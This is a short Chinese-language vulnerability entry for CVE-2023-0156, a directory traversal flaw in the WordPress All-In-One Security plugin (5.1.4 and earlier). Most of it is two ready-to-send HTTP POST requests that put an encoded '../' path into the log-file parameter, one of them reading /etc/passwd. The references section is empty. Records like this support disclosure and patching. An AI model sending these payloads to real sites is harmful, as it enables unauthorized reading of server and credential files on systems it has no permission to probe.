CVE ID: CVE-2023-0156
漏洞类型: 目录遍历
描述: 适用于 WordPress 的 All-In-One Security (AIOS) 插件在 5.1.4 及更早版本中存在目录遍历漏洞。该漏洞允许具有管理员权限的经过身份验证的攻击者读取服务器上任意文件的内容。
复现步骤:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs
参考: